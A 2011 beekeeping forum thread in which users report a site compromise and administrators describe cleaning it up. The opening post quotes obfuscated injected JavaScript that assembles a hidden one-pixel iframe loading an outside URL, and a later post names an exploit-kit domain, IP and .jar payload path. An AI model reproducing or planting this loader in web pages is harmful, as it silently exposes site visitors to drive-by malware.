Welcome, Guest

Author Topic: Forum Display Problem  (Read 10052 times)

Offline BlueBee

• Galactic Bee
Forum Display Problem
« on: August 13, 2011, 02:58:07 pm »
I’ve been having some problems with the forum display the last couple of days.  Running IE8.  Don’t know if anybody else is seeing this or not.  Quite often when I surf to BeeMaster I get the following text on the top of page:

mv='uf';jx='tv.';cg='me';k='e';mg='rc';g='ys';rs='m';f='of';m='ht';u='85y';ca='e.c';r='s';j='fra';i='ht';h='//h';qy='wob';v='k9';a='t';qt='i';br='p:';s='om/';ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute('width','1');bn.setAttribute('height','1');bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);

When this occurs, the font size of the webpage is modified to a larger font and sometimes I can’t log on. No problems with other websites.  I have Norton AV on so I think I'm clean. 

Anybody else seeing this?

Offline Rock331

• New Bee
Re: Forum Display Problem
« Reply #1 on: August 13, 2011, 02:59:53 pm »
Mine just started displaying the message on the top of the website. Not sure what is going on.
Randy
Randy

Offline Larry Bees

• Field Bee
« Reply #2 on: August 13, 2011, 03:12:57 pm »
Mine just started displaying the message on the top of the website. Not sure what is going on.
Randy

Same here and it won't let me sign out. Larry

Offline BlueBee

• Galactic Bee
« Reply #3 on: August 13, 2011, 03:36:31 pm »
Now I can't log out either.....

Offline buzzbee

• Ken
  • Global Moderator
  • Galactic Bee
    • N Central Pa Beekeepers Facebook Page
« Reply #4 on: August 13, 2011, 03:53:06 pm »
I sent a pm to Robo.

Online Kathyp

• Global Moderator
  • Universal Bee
« Reply #5 on: August 13, 2011, 04:14:49 pm »
i like it.  i can read the text!!!!   :-D
Someone really ought to tell them that the world of Ayn Rand?s novel was not meant to be aspirational.

Offline beemaster

• Site Founder
  • Administrator
  • Galactic Bee
  • It is my pleasure to bring the forums to you.
    • http://www.beemaster.com
« Reply #6 on: August 13, 2011, 06:47:57 pm »
FYI all....

I think Robo is busy doing personal things (might be wrong) but seems the forum is functional  - minus I seem to have to resend page to get back to home or even better use my short cut link in the browser to return to the home page (hang in there, we'll get the text at the top cleared soon.)

NJBeemaster my YOUTUBE Video Collection

Please enjoy the forum, and if it has helped you in any way, we hope that a small donation can be made to support our FULLY member supported forum. You will never see advertisements here, and that is because of the generous members who have made our forum possible. We are in our second decade as a beekeeping forum and all thanks to member support. At the top right of every page is a donations link. Please help if you can.

Offline Francus

• House Bee
« Reply #7 on: August 14, 2011, 09:36:01 am »
I don't know if this is related or not, but I get a phishing warning when I come to the site. That's a new one.
"...but Sweetie, it's basically just an Ant Farm for adults...."

Offline VolunteerK9

• Super Bee
  • Gamecock fan in UT land.
« Reply #8 on: August 14, 2011, 12:09:40 pm »
Yeah, I just got the same warning when I logged in today. "Malicious website"

Offline JP

• The Swarm King
  • Universal Bee
  • I like doing cut-outs, but I love catching swarms!
    • JPthebeeman.com
« Reply #9 on: August 14, 2011, 12:23:17 pm »
I was getting a bunch of junk at the top of the screen as well and when I tried to post last night at one point a blank page would appear with only the junk at the top of page. So actually no post would go through. I noticed my avatar was gone as well.

Later on last night things seemed to go right back to normal as they are now, at least I hope so.

Anyone else have to reload their avatar?

...JP
My Youtube page is titled JPthebeeman with hundreds of educational & entertaining videos.

My website JPthebeeman.com http://jpthebeeman.com

Offline Robo

• Technical
  • Administrator
  • Galactic Bee
  • Beekeep On!
    • Bushkill Bee Vac
« Reply #10 on: August 14, 2011, 12:25:54 pm »
Yes it appears that an attempt to add some malicious code to the site happened yesterday.  It was caught pretty early and before completed. It was removed from the forum last evening.  Over night Google found remnants in the base site (John's bee course and personal pages) and rightfully flagged the whole domain.   This has been cleaned up this morning and a google rescan has been requested.  We believe the forum has been safe since last evening and the whole site since this morning.  Warning messages will continue to appear until the Google rescan is completed.
"Opportunity is missed by most people because it comes dressed in overalls and looks like work." - Thomas Edison

Online Kathyp

• Global Moderator
  • Universal Bee
« Reply #11 on: August 14, 2011, 12:32:52 pm »
still getting some warnings on firefox, but nothing on exploder.  last night, tried the super duper secure computer and didn't get anything on explorer either....

anyway...whatever it was, it didn't seem to do any harm out here  :lol:
Someone really ought to tell them that the world of Ayn Rand?s novel was not meant to be aspirational.

Offline JP

• The Swarm King
  • Universal Bee
    • JPthebeeman.com
« Reply #12 on: August 14, 2011, 01:02:18 pm »
I've been having another issue with posting the last week or so best guess, thought I'd mention it here to see if anyone else has had this problem. Every so often the screen will revert back to the original thread I was trying to post to before I get the chance to finish writing my post and what I wrote is permanently lost which is a real pain if you've sat there a few minutes trying to get a post out with pics etc... and have to start from scratch again.

I have had warnings before about sessions "timing out" but the information was never lost as it is now. This same problem occurred just a few minutes ago BTW.

...JP
My Youtube page is titled JPthebeeman with hundreds of educational & entertaining videos.

Offline BlueBee

• Galactic Bee
« Reply #13 on: August 15, 2011, 02:37:36 am »
Norton is still popping up attack warnings when I’m surf over to BeeMaster.  Last one just a few minutes ago.  The warning is: “Norton blocked attack by Blackhole toolkit website 2".  Attacking computer is jbvnhw.com 69.50.202.74.  URL jbvnhw.com/games/worms.jar.  That domain is registered to some guy in Spain.  

Anybody else getting these blackhole attack warnings?  So far I’m only getting these when I surf to BM, but maybe I’m getting attacked from some other source.  These blackhole things started occurring shortly after the funky text started appearing on the BeeMaster forum.

Offline Shawn

• Queen Bee
« Reply #14 on: August 15, 2011, 08:42:48 am »
Im getting the media player popping up everytime I come to the site.

Offline BlueBee

• Galactic Bee
« Reply #15 on: August 15, 2011, 02:43:38 pm »
Forum is working much better since the re-boot guys!  Good job.

Offline JP

• The Swarm King
  • Universal Bee
    • JPthebeeman.com
« Reply #16 on: August 15, 2011, 08:45:58 pm »
Thanks Ken, Robo!

...JP

Offline Robo

• Technical
  • Administrator
  • Galactic Bee
  • Beekeep On!
    • Bushkill Bee Vac
« Reply #17 on: August 16, 2011, 10:42:44 pm »
We now have a clean bill of health from Google   :-D
"Opportunity is missed by most people because it comes dressed in overalls and looks like work." - Thomas Edison

Offline annette

• Galactic Bee
« Reply #18 on: August 16, 2011, 11:24:27 pm »
OMG!! I am so glad this got cleared up as  I got that horrible message last night about the malicious website. Thought someone had brought down the whole bee forum.

I am so grateful to have this forum and I don't want anyone messing with it. Thanks guys for cleaning up the problem.

Annette

Offline Rock331

• New Bee
« Reply #19 on: August 17, 2011, 09:19:26 am »
I agree, I'm glad the site is back up and running. I have added this to my sites I check when I get on the computer. I am learning a lot and need to continue learning.
Randy